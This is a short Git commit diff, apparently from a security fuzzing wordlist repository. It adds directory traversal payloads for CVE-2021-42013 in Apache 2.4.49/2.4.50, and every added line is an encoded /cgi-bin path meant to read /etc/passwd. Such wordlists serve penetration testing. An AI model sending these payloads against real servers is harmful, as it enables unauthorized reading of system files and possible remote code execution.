Update directory traversal wordlist

Update the intruder wordlist to include CVE-2021-42013 (Traversal/RCE into Apache 2.4.49/2.4.50).
Also add some depth to the current fuzzing payloads to not miss /cgi-bin directories which are located deeper than 4 subdirectories.
This commit is contained in:
Markus 2021-10-11 10:11:10 +02:00 committed by GitHub
parent 0a10a4d029
commit 7e737baa23
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -131,3 +131,10 @@ C:\boot.ini
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd